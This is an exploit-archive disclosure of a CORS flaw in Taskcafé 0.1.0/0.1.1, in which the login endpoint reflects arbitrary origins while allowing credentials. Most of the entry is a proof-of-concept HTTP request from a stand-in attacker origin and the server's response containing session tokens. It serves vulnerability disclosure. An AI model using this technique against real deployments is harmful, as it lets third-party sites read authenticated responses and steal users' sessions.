Exploit for Taskcafe 0.1.0 / 0.1.1 Cross Origin Resource Sharing

## https://sploitus.com/exploit?id=PACKETSTORM:160083
#Exploit Title: Taskcafé 0.1.0 and 0.1.1- Cross-Origin Resource Sharing  
#Date: 2020- 09- 02  
#Exploit Author: Mufaddal Masalawala  
#Vendor Homepage: https://github.com/JordanKnott/  
#Software Link: https://github.com/JordanKnott/taskcafe  
#Version: 0.1.0 and 0.1.1  
#Tested on: Kali Linux 2020.3  
#POC:  
The web application fails to properly validate the Origin header  
and returns the header Access-Control-Allow-Credentials: true. In this  
configuration any website can issue requests made with user credentials and  
read the responses to these requests. Trusting arbitrary origins  
effectively disables the same-origin policy, allowing two-way interaction  
by third-party web sites.  
#REQUEST:  
POST /auth/login HTTP/1.1  
Host: 10.20.175.152:3333  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0)  
Gecko/20100101 Firefox/80.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://10.20.175.152:3333/login  
Content-Type: text/plain;charset=UTF-8  
Origin: http://attacker-website.com  
Content-Length: 43  
Connection: close  
Cookie: refreshToken=c00f94f3-c151-4e13-8084-ea160d94e584  
{"username":"XXXX","password":"XXXXXX"}  
#RESPONSE:  
HTTP/1.1 200 OK  
Access-Control-Allow-Credentials: true  
Access-Control-Allow-Origin: http://attacker-website.com  
Access-Control-Expose-Headers: Link  
Content-Type: application/json  
Set-Cookie: refreshToken=9048c8fd-0f7c-4c9d-9e88-2cd9f7a25d61; Expires=Thu,  
03 Sep 2020 04:22:10 GMT; HttpOnly  
Vary: Origin  
Date: Wed, 02 Sep 2020 04:22:10 GMT  
Content-Length: 271  
Connection: close  
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI4YmRhMmY5ZS1iM2E3LTRmNzgtOTQ2Ny05YWZmNGM0OGFkZTAiLCJyZXN0cmljdGVkIjoidW5yZXN0cmljdGVkIiwib3JnUm9sZSI6Im1lbWJlciIsImV4cCI6MTU5OTAyMDUzNX0.eDYvNvXRf6CKULCOrMLAtKnUek9Y8IP9YnVXRAR74gE","isInstalled":false}